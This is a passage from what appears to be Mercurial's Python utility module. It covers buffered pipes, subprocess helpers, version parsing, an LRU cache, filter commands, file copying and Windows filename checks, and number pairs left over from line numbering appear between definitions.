    Everything returned by read() is counted and hashed; validate()
    then compares the totals with the expected size and digests.

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        # private copy of the expected digests, keyed by digest name
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        chunk = self._fh.read(length)
        self._digester.update(chunk)
        self._got += len(chunk)
        return chunk

    def validate(self):
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                    (name, expected, actual))
307 306
try:
    buffer = buffer
except NameError:
    # no builtin buffer available: provide a memoryview-based stand-in
    def buffer(sliceable, offset=0, length=None):
        """Return a memoryview of sliceable starting at offset, limited to
        length items when length is given."""
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
315 314
# value passed as close_fds= to the subprocess calls in this module; true only
# when pycompat.osname is 'posix'
closefds = pycompat.osname == 'posix'

# number of bytes requested per os.read() call by bufferedinputpipe
_chunksize = 4096
319 318
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer
    is empty from the outside (allowing collaboration of the buffer with
    polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        # list of chunks read but not yet returned; _lenbuf is their total
        # length
        self._buffer = []
        self._lenbuf = 0
        self._eof = False

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` data, filling the buffer until EOF if needed"""
        while self._lenbuf < size and not self._eof:
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """Return data up to and including the next newline (or up to EOF)"""
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            joined = ''.join(self._buffer)
            self._buffer = [joined]
            self._lenbuf = len(joined)
        newline = -1
        if self._buffer:
            newline = self._buffer[-1].find('\n')
        while newline < 0 and not self._eof:
            self._fillbuffer()
            if self._buffer:
                # only the most recently appended chunk can hold a newline
                newline = self._buffer[-1].find('\n')
        if newline < 0:
            # end of file: hand out whatever is left
            size = self._lenbuf
        else:
            size = newline + 1
            if len(self._buffer) > 1:
                # we need to take previous chunks into account
                size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        if len(self._buffer) > 1:
            whole = ''.join(self._buffer)
        else:
            whole = self._buffer[0]

        data = whole[:size]
        rest = whole[len(data):]
        if rest:
            self._buffer = [rest]
        else:
            self._buffer = []
        self._lenbuf = len(rest)
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        chunk = os.read(self._input.fileno(), _chunksize)
        if chunk:
            self._lenbuf += len(chunk)
            self._buffer.append(chunk)
        else:
            self._eof = True
413 412
def popen2(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell and return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    pipes = (proc.stdin, proc.stdout)
    return pipes
424 423
def popen3(cmd, env=None, newlines=False):
    """Like popen4() but return only the (stdin, stdout, stderr) pipes."""
    pipes = popen4(cmd, env, newlines)
    # drop the trailing process object
    return pipes[0], pipes[1], pipes[2]
428 427
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run ``cmd`` through the shell with all three standard streams piped.

    Returns (stdin, stdout, stderr, process).
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
437 436
def version():
    """Return version information if available."""
    try:
        from . import __version__
        # the attribute access stays inside the try block so that an
        # ImportError surfacing at this point is handled as well
        found = __version__.version
    except ImportError:
        found = 'unknown'
    return found
445 444
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4 (any other value makes the function return
    None). Here is how some version strings map to returned values:

    >>> v = '3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = '3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = '3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = '3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # split off everything after the first '+' or '-'; '+' needs no backslash
    # inside a character class, which keeps the literal free of invalid
    # string escapes
    parts = remod.split('[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
514 513
# used by parsedate
# strftime/strptime-style patterns for full dates, partial dates and times
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    # NOTE(review): the next entry repeats the "without seconds" form above
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# the default formats plus coarser ones naming only a year and/or a month
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
556 555
def cachefunc(func):
    '''cache the result of function calls

    The wrapper is chosen from the number of positional arguments func
    declares: none, exactly one, or anything else.
    '''
    # XXX doesn't handle keywords args
    nargs = func.__code__.co_argcount

    if nargs == 0:
        # a list is used as a one-slot holder for the single result
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f

    memo = {}
    if nargs == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
        return f

    def f(*args):
        if args not in memo:
            memo[args] = func(*args)
        return memo[args]
    return f
582 581
class sortdict(collections.OrderedDict):
    '''an ordered dictionary that keeps keys in last-set order

    Setting a key that is already present moves it to the end instead of
    keeping its original position.

    >>> d1 = sortdict([('a', 0), ('b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([('a', 2)])
    >>> d2.keys() # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # drop any existing entry first so the key is re-appended at the end
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            # route every pair through self[k] = v so the reordering in
            # __setitem__ applies
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
607 606
class transactional(object):
    """Base class for making a transactional type into a context manager.

    Leaving the ``with`` block without an exception calls close() and then
    release(); leaving it with an exception calls release() only.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            # always runs, including when close() itself raises
            self.release()
632 631
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    Otherwise the transaction is closed when the body succeeds or raises
    error.InterventionRequired (which is re-raised), and is released in
    every case.
    """
    if tr:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            tr.close()
            raise
        finally:
            tr.release()
    else:
        yield
650 649
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on entry or exit."""
    yield
654 653
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # a fresh node is unlinked and carries no entry
        self.next = self.prev = None
        self.value = None
        self.markempty()

    def markempty(self):
        """Mark the node as emptied."""
        # _notset is the "no entry here" marker for the key slot
        self.key = _notset
673 672
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Nodes without an entry (key is _notset) are kept together at the
    oldest end of the list: the initial node starts there and __delitem__
    moves emptied nodes there.
    """
    def __init__(self, max):
        # key -> node
        self._cache = {}

        # the list starts as a single empty node linked to itself
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        # number of nodes allocated so far (not the number of entries)
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` or ``default``.

        Unlike __getitem__, this does not mark the entry as newest.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Empty every node holding an entry and reset the backing dict."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same entries and ordering."""
        result = lrucachedict(self._capacity)

        # Empty nodes sit at the oldest end of the list (always the case
        # unless the cache is full), so skip them; otherwise _notset would
        # be copied as a key and real entries would be left out.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # A.prev = N
        node.next.prev = node
        # E.next = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
832 831
def lrucachefunc(func):
    '''cache most recent results of function calls

    Before a new result is stored, the least recently used entry is evicted
    if the cache already holds more than 20 results.
    '''
    results = {}
    # keys ordered from least to most recently used
    recency = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in results:
                recency.remove(arg)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[arg] = func(arg)
            recency.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                recency.remove(args)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[args] = func(*args)
            recency.append(args)
            return results[args]

    return f
859 858
class propertycache(object):
    """Descriptor that computes an attribute once and stores it on the object.

    __get__ calls the wrapped function and writes the result into the
    instance __dict__ under the function's name.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        """Store ``value`` as the cached attribute on ``obj``."""
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
872 871
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # communicate() returns (stdout, stderr); only stdout is piped here
    return proc.communicate(s)[0]
879 878
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.

    Raises Abort when the command exits with a non-zero status. Both
    temporary files are removed afterwards on a best-effort basis.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        infile = os.fdopen(infd, pycompat.sysstr('wb'))
        infile.write(s)
        infile.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        # only the name is needed; the command writes the file itself
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname).replace('OUTFILE', outname)
        status = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and status & 1:
            status = 0
        if status:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(status)))
        return readfile(outname)
    finally:
        for leftover in (inname, outname):
            try:
                if leftover:
                    os.unlink(leftover)
            except OSError:
                pass
913 912
# command prefix -> function implementing that filtering strategy; consulted
# by filter()
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
918 917
def filter(s, cmd):
    """filter a string through a command that transforms its input to its output

    A prefix of cmd listed in filtertable selects the strategy; without one
    the command is run through pipefilter.
    """
    for prefix, handler in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        stripped = cmd[len(prefix):].lstrip()
        return handler(s, stripped)
    return pipefilter(s, cmd)
925 924
def binary(s):
    """return true if a string is binary data

    "Binary" means non-empty and containing a NUL character.
    """
    if not s:
        return False
    return '\0' in s
929 928
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen < min:
            continue
        if min < max:
            min <<= 1
            # largest power of two not exceeding the buffered length
            # (1 when nothing is buffered)
            if pendinglen:
                floorpow2 = 1 << (pendinglen.bit_length() - 1)
            else:
                floorpow2 = 1
            if floorpow2 > min:
                min = floorpow2
            if min > max:
                min = max
        yield ''.join(pending)
        pendinglen = 0
        pending = []
    if pending:
        # flush whatever is left once the source is exhausted
        yield ''.join(pending)
960 959
# module-level alias for error.Abort; functions in this module raise it by
# this name
Abort = error.Abort
962 961
def always(fn):
    """Predicate that returns True whatever ``fn`` is."""
    return True
965 964
def never(fn):
    """Predicate that returns False whatever ``fn`` is."""
    return False
968 967
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking
    has no effect on when GCs are triggered, only on what objects the GC
    looks into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.

    The returned wrapper re-enables the collector afterwards only if it was
    enabled when the call started.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()
    return wrapper
991 990
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # so the decorator is replaced by one that returns the function unchanged
    nogc = lambda x: x
995 994
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    origin, target = splitpath(n1), n2.split('/')
    # count the leading components both paths share
    shared = 0
    limit = min(len(origin), len(target))
    while shared < limit and origin[shared] == target[shared]:
        shared += 1
    # climb out of what remains of the origin, then descend into the target
    ups = ['..'] * (len(origin) - shared)
    return pycompat.ossep.join(ups + target[shared:]) or '.'
1021 1020
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).

    The checks are tried in order and the first truthy result is returned.
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1031 1030
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# hand the computed location to the i18n module
i18n.setdatapath(datapath)

# cached result of hgexecutable(); None until first computed
_hgexecutable = None
1042 1041
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The location is worked out on the first call, recorded through
    _sethgexecutable(), and reused afterwards.
    """
    if _hgexecutable is not None:
        return _hgexecutable

    hg = encoding.environ.get('HG')
    mainmod = sys.modules[pycompat.sysstr('__main__')]
    if hg:
        location = hg
    elif mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            location = encoding.environ['EXECUTABLEPATH']
        else:
            location = pycompat.sysexecutable
    elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
        # the running main script is itself named 'hg'
        location = pycompat.fsencode(mainmod.__file__)
    else:
        location = findexe('hg') or os.path.basename(sys.argv[0])
    _sethgexecutable(location)
    return _hgexecutable
1066 1065
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # rebinds the module-level cache read by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1071 1070
def _isstdout(f):
    """Tell whether ``f`` shares its file descriptor with sys.__stdout__.

    The result is falsy (None) when ``f`` has no ``fileno`` attribute.
    """
    fileno = getattr(f, 'fileno', None)
    return fileno and fileno() == sys.__stdout__.fileno()
1075 1074
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out

    The result is a copy of encoding.environ updated with the entries of
    ``environ`` (values converted to strings), with 'HG' set to the hg
    executable last of all.
    """
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        for name, value in environ.iteritems():
            env[name] = py2shell(value)
    env['HG'] = hgexecutable()
    return env
1090 1089
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.

    returns the command's exit code.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    redirect = not (out is None or _isstdout(out))
    if redirect:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        # relay the combined output line by line until readline() returns ''
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    else:
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1117 1116
def checksignature(func):
    '''wrap a function with code to check for calling errors

    A TypeError whose traceback is a single frame deep (raised by the call
    itself rather than from inside func) is turned into
    error.SignatureError; any other TypeError propagates unchanged.'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            tb = sys.exc_info()[2]
            depth = len(traceback.extract_tb(tb))
            if depth == 1:
                raise error.SignatureError
            raise

    return check
1129 1128
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1144 1143
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.

    An existing dest is removed first. With hardlink set, a hard link is
    attempted when dest's filesystem is whitelisted, falling back to a
    regular copy on failure.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat so ambiguity can be detected after copy
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype in _hardlinkfswhitelist:
            try:
                oslink(src, dest)
                return
            except (IOError, OSError):
                pass # fall back to normal copy
    if os.path.islink(src):
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
        os.symlink(os.readlink(src), dest)
        return
    try:
        shutil.copyfile(src, dest)
        if copystat:
            # copystat also copies mode
            shutil.copystat(src, dest)
        else:
            shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
    except shutil.Error as inst:
        raise Abort(str(inst))
1196 1195
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    When hardlink is None it is decided by comparing the devices of source
    and destination. Returns (hardlink, num): whether hardlinking is still
    in use and the number of files copied.
    """
    num = 0

    def gettopic():
        return hardlink and _('linking') or _('copying')

    dstdev = os.path.dirname(dst)
    if not os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(dstdev).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: copy now and stop trying to link
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    else:
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(dstdev).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset the child's position by what was copied so far
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, copied = copyfiles(srcname, dstname, hardlink,
                                         progress=nprog)
            num += copied
    progress(topic, None)

    return hardlink, num
1236 1235
# base names (compared in lower case) and characters that checkwinfilename()
# reports as reserved on Windows
_winreservednames = b'''con prn aux nul
    com1 com2 com3 com4 com5 com6 com7 com8 com9
    lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename("just/a/normal/path")
    >>> checkwinfilename("foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/xml.con")
    >>> checkwinfilename("foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename("foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename("../bar")
    >>> checkwinfilename("foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename("foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    components = path.replace('\\', '/').split('/')
    for part in components:
        if not part:
            continue
        for char in _filenamebytestr(part):
            if char in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % char
            if ord(char) <= 31:
                return _("filename contains %r, which is invalid "
                         "on Windows") % char
        # only the portion before the first dot is matched against the
        # reserved names
        stem = part.split('.')[0]
        if stem and stem.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % stem
        last = part[-1]
        # '.' and '..' themselves are accepted
        if last in '. ' and part not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % last
1287 1286
# pick the filename checker and the default timer for this platform
if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# time.perf_counter, when available, overrides either choice above
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1297 1296
def makelock(info, pathname):
    '''Create a lock at pathname that records info.

    A symlink whose target is info is tried first. If that fails for a
    reason other than the lock already existing, or os.symlink is not
    available, a regular file containing info is created exclusively
    instead.

    An OSError with errno EEXIST from os.symlink is re-raised.
    '''
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    try:
        os.write(ld, info)
    finally:
        # do not leak the descriptor when the write fails
        os.close(ld)
1310 1309
def readlock(pathname):
    '''Return the info stored in the lock at pathname.

    The symlink target is returned when pathname can be read as a
    symlink. If os.readlink fails with EINVAL or ENOSYS, or is not
    available, the content of the file at pathname is returned instead.
    Any other OSError is re-raised.
    '''
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    try:
        return fp.read()
    finally:
